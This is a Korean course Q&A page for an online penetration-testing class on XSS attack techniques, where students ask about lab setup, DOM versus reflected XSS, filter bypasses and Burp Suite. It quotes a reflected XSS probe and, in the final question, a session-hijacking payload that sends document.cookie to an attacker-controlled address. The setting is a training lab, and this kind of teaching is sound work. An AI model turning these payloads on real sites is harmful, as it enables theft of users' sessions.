66,000원
다른 수강생들이 자주 물어보는 질문이 궁금하신가요?
- 미해결모의해킹 실무자가 알려주는, XSS 공격 기법
비트나미 설치 전에 APM같은거 설치되신 분들은
비트나미 이전에 다른 프로그램 설치되신 분들은 아마비트나미 설치 프로그램 실행 시에아파치 포트와 mysql 포트가 80, 3306이 아닌 81,3307등으로 될텐데그렇게 설치하시면 설정을 또 바꿔줘야 하니까cmd 실행 후 "netstat -ano | findstr :3306" 그리고 "netstat -ano | findstr :80"두개 입력하시면 LISTENING 이라고 포트 실행중인게 나옵니다.LISTENING 옆에 숫자가 나오는데 해당 숫자가 PID가 되며작업관리자 실행 뒤에 PID 정렬버튼 눌러서 해당 PID에 맞는 프로세스 종료시킨 뒤다시 아파치와 MySQL 포트를 80과 3306으로 설정하시면 됩니다.
- 미해결모의해킹 실무자가 알려주는, XSS 공격 기법
board 접속시 에러가 납니다
board 접속시 이미 로그인 된 상태로 나오며 location.href='index.php?page=error&value={$page}';"; } ?>라는 에러메세지가 출력되고 join, mypage등 아무것도 보이지 않습니다. 문제 해결을 위해list.php의 30줄에 result=db_conn->query($query) or die($db_conn->error); 구문을 추가하였으며common.php의 pw는 변경한 상태입니다
- 미해결모의해킹 실무자가 알려주는, XSS 공격 기법
검증 로직에 따른 각종 우회 기법
안녕하세요, 강사님강사님 강의 수강생입니다.우회기법 실습 중인데, board>action.php에서 preg_match 함수가 적용이 안되어서 혹시 php에서 설정해야 하는 부분이 있는지 문의 드립니다.
- 해결됨모의해킹 실무자가 알려주는, XSS 공격 기법
궁금한점이 있어 질문 남깁니다!
세션 하이재킹을 위해 location 부분에 적는 공격자의 IP는실제 포트포워딩을 할 경우 공인 IP를 기입해야 하나요?사설 IP를 기입해야 하나요??
- 해결됨모의해킹 실무자가 알려주는, XSS 공격 기법
Board 관련 문의
안녕하세요 지난 주에 문의글 작성했던 수강생입니다. 말씀 하신 DB 생성 및 테이블 강의에서 설명하는대로 정상적으로 만들었고 common.php 소스코드 역시 첨부 드립니다. pw는 "134679"로 제가 입력했던 패스워드로 변경했구요, 다만 다른 사람들과의 차이라면 포트번호를 81번 포트로 지정을 했는데 다른 게시글을 보니 따로 입력할 필요는 없다고 하셔서 "127.0.0.1"에서 따로 변경은 하지 않았습니다. 혹시 이 설정에서 다른 문제가 있던걸까요?
- 미해결모의해킹 실무자가 알려주는, XSS 공격 기법
board 오류
board 화면안에 아무것도 뜨질 않습니다 ㅠcommon.php 안에 비밀번호도 DB에 설정한 걸로 맞췄고 다른 수강생들이 문의했던 내용 확인해서 선생님이 하라고 한 설정 또한 다 맞춰보고 몇번씩 지우고 새로 설치하고도 해봤는데 증상이 바뀌질 않네요 ㅠㅠ 다른 추가 해결방안 있으면 답변 부탁드립니다. ps. 다른 질문 게시판 전부 확인해서 그쪽에 있는 내용 말고 다른 방안 있으면 부탁드릴게요!
- 미해결모의해킹 실무자가 알려주는, XSS 공격 기법
mysql 대신 mariadb폴더
디렉토리에 mysql폴더 대신 mariadb폴더가 있는데 상관없나요? 또한 board로 가서 join을 눌러도 페이지의 변동이 없습니다
- 미해결모의해킹 실무자가 알려주는, XSS 공격 기법
wampstack 폴더안에 Mysql 폴더가 설치되어 있지 않습니다.
wampstack 폴더안에 Mysql 폴더가 설치되어 있지 않습니다.3강에서 설명해주시는 내용 실습하기위해mysql - bin 폴더를 복사붙여넣기 해야한다고하셨는데,폴더가 보이지 않아서 질문합니다. wamp를 다시 설치해야하나요?
- 미해결모의해킹 실무자가 알려주는, XSS 공격 기법
가상 환경 및 실습 예제 환경 세팅 때문에 안되서 힘드네요
가상 환경 및 실습 예제 환경 세팅 아무것도 안되네요
- 해결됨모의해킹 실무자가 알려주는, XSS 공격 기법
강의 교재
강의 교재가 별도로 없나요? 수업을 다 듣고 복습차원에서 교재를 보고 싶은데 교재가 없네요. 수업 진행 시 PPT를 받아 볼 수 있을까요?
- 해결됨모의해킹 실무자가 알려주는, XSS 공격 기법
섹션 4. 공격상세방법론 - [미션] 게시판 취약점 찾기 풀이 검토 및 개인적인 질문
안녕하세요. 크리핵 티브님 미션으로 주셨던 강의 내용 풀이 시도한 내용과 개인적인 질문 내용 드리겠습니다. 미션1) board/index.php에서 XSS 취약점을 최대한 많이 찾아보는 미션-> 맨 처음에는 black-box test 방식으로 시도했으나 도무지 방법을 찾지 못해서 php 코드를 보고 풀이를 했습니다.-> 붉은 상자로 표시한 부분에 value 값에 XSS 구문을 넣으면 XSS가 가능할 것으로 판단 했습니다.-> 그래서 URL에 vlaue=<script>alert('XSS');</script> 구문을 넣어서 XSS가 잘 동작함을 확인했습니다.-> DOM을 통해 client 단에서 동작하는 것이 아니기 때문에 Reflected-XSS로 판단합니다.[검증]-> burp suite로 XSS를 동작시킬 때 Response부분을 잡아본 것인데 Response에 alert('XSS')가 들어감을 확인할 수 있습니다. [질문1]위에서 Refelected XSS외에 다른 XSS 취약점을 찾지 못했는데 다른 XSS 취약점도 있는지 궁금합니다. 그리고 제가 아직 모든 강의를 끝까지 들은건 아닌데 혹시 추후 강의 들에서 풀이가 있는지도 궁금합니다. 미션2) xss/eample5.php에서 어떤 XSS가 가능한지, DOM인지 Relfected 인지 한 번 찾아보는 미션-> 이 역시도 black-box test방식으로 시도했으나 결국 성공하지 못해 php코드를 확인하고 XSS를 시도하였습니다.-> permissionCheck() 함수를 이용해서 XSS 공격을 시도해 봤습니다.-> URL에 ");로 if문을 닫아 버린 다음에 <script>태그를 이용했으나 필터링 코드에 의해 막혔습니다.-> 그래서 필터링 코드를 우회하기 위해 XSS cheat sheet를 이용했습니다.-> 위의 이미지외에 여러 cheat sheet에 있는 코드를 시도했으나 모두 실패했습니다.-> php코드를 보면 DOM XSS와 Relfected XSS모두 가능할 것 같지만 잘 모르겠습니다. [질문 2]해당 필터링 구문을 우회하려면 어떻게 하는지 궁금합니다. [질문3-개인적인 질문]현업에서는 black box test방식으로 모의해킹을 진행하게 되면 back-end단에서 돌아가는 코드(ex. php, jsp, asp, Node.js 등)구조를 알 수가 없는데 그러면 그냥 guessing을통해서만 XSS취약점을 점검해야 하는지 궁금합니다.(전제 조건이 file download/upload취약점을 사용하지 않고 XSS를 점검하는 경우를 질문드리는 겁니다.) 감사합니다.
- 해결됨모의해킹 실무자가 알려주는, XSS 공격 기법
board 화면에 아무런 정보가 뜨지 않습니다.
이런 화면이 발생하고 있습니다.코드는 패스워드 외 수정한건 없구요~table 생성 화면테이블 select 쿼리문(db내용이 없으면 아래처럼 뜨는게 맞나요?
- 해결됨모의해킹 실무자가 알려주는, XSS 공격 기법
DOM과 Reflected XSS 차이
안녕하세요. XSS 강의 잘 수강하고 있습니다.제목 그대로 DOM XSS와 Reflected XSS의 차이에 대해서 궁금한게 있어서 문의드립니다. DOM based XSS와 Reflected XSS의 차이가 클라이언트 측에서 동적 페이지를 구성하냐, 서버 측에서 구성하냐라고 하셨는데, Reflected XSS에서 서버 측 어플리케이션 단에서 동적 페이지를 구성한다는게 조금 이해가 안 가서 그러는데 혹시 예시를 들어주실 수 있을까요?감사합니다.
- 해결됨모의해킹 실무자가 알려주는, XSS 공격 기법
common.php수정
수정한 부분인데 잘못된 부분이 있을까요..?
- 해결됨모의해킹 실무자가 알려주는, XSS 공격 기법
board 화면에서 500에러가 뜹니다.
안녕하세요, 수업 진행 도중 board/index에서 페이지가 제대로 출력되지 않습니다. home, board, join 세 메뉴 모두 그렇습니다. 해결 방법이 있을까요?
- 해결됨모의해킹 실무자가 알려주는, XSS 공격 기법
wamp bitnami 서비스 종료 했어요
다르게 바꿔 주세요 강의를
- 해결됨모의해킹 실무자가 알려주는, XSS 공격 기법
DOM BASED XSS 에서 POST 방식과 URL에서 #?사용효과
크리핵티브님 안녕하세요.DOM BASED XSS에서 POST방식을 쓰면 사용자 입력 값을 불러올 방법이 없기 때문에 못쓴다고 하셨는데 클라이언트가 POST방식으로 서버에 보내고 서버에서 되돌려준다면 DOM을 통해 페이지 구성할 수 없는건가요?
- 해결됨모의해킹 실무자가 알려주는, XSS 공격 기법
[실습7-2] 키로깅 공격실습
마지막 부분에 웹서버에서 입력받은 값이 db에 저장되는 과정은 https랑 아무 관련 없다는 말씀하셨습니다.wamp나 apm이나 같은 방식으로 동작하는거 같은데 어떻게 apache랑 mariadb가 통신하는지 원리가 궁금합니다.이런건 생각해 본적이 없었는데 강의를 듣고 나니 저도 궁금해지네요.
- 해결됨모의해킹 실무자가 알려주는, XSS 공격 기법
섹션8. 실무 진단시 주의사항 (주의사항-2 부분)
안녕하세요 선생님. 주의사항-2 강좌 보다가 막히는 부분이 있어 문의드립니다. ^^;3:02 부분에 보시면 view page에서 xss 대입이 들어가서 수정 , 삭제, 목록 에 대한 버튼이 보이지 않아버프 스위트로 인터셉트 해서 response 부분에 alert(document.cookie)를 삭제한 후 다시 버튼이 보이도록 하셨는데요.. 아무리 해도 pretty 부분은 커뮤니티 에디션이지만 삭제가 되지 않고 있습니다. 혹시 버프스위트에서 response부분에 수정을 가하려면 별도의 옵션 설정이 필요한지 문의드립니다. * 제가 사용하는 버프 스위트 버전은 커뮤니티 에디션 v2022.8.5 버전입니다. ** response 부분에 pretty, raw에서 alert부분을 찾아 삭제를 하려고 해도 삭제가 적용되지 않습니다. (보기만 가능)
- 미해결모의해킹 실무자가 알려주는, XSS 공격 기법
[실습6-3] REFLECTED XSS를 통한 세션 하이재킹 공격 실습 공격 실패
<script>new image().src='">http://제아이피/xss_attack/session.php?data='+document.cookie</script>location.href 스크립트는 성공했는데했는데 new image().src는 세션값이 안넘어 옵니다...혹시 자바1.8.0버전과 관련있을까요??